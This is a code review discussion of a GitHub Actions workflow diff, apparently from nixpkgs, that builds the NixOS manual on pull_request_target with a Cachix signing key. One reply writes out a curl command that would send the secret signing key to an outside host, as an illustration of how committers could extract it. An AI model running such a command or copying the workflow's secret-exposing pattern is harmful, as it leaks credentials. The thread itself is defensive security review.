.github/workflows/manual-nixos.yml

```diff
@@ -0,0 +1,25 @@
+name: "Build NixOS manual"
+
+on:
+  pull_request_target:
+    paths:
+      - 'nixos/**'
+
+jobs:
+  nixos:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v2
+        with:
+          # pull_request_target checks out the base branch by default
+          ref: refs/pull/${{ github.event.pull_request.number }}/merge
+      - uses: cachix/install-nix-action@v12
+        with:
+          # explicitly enable sandbox
+          extra_nix_config: sandbox = true
+      - uses: cachix/cachix-action@v8
+        with:
+          name: nixpkgs-ci
+          signingKey: '${{ secrets.CACHIX_SIGNING_KEY }}'
```

Comment:
@domenkozar Do you see any way an attacker could extract the signing key in this case?

Reply:
Anybody with nixpkgs push access can extract the signing key easily.

Push a commit on a branch with `curl https://myside.com/${{ secrets.CACHIX_SIGNING_KEY}` somewhere in the actions, then enjoy your logs.

We should make sure that nobody consumes that cache except github actions.

Reply:
I'd suggest to delete the cache and generate a new one managed with auth tokens. That will ensure tokens can be revoked without losing the cache.

On top of that, until we can give committers only merge access and not direct commit access, about 140 people can extract the key. I don't think anyone would do it on purpose, but hacking 1 of 140 github accounts is not infeasible.

I suggest we add explicit note that the cache should not be trusted outside the CI usage.

Reply:
> I suggest we add explicit note that the cache should not be trusted outside the CI usage.

Done.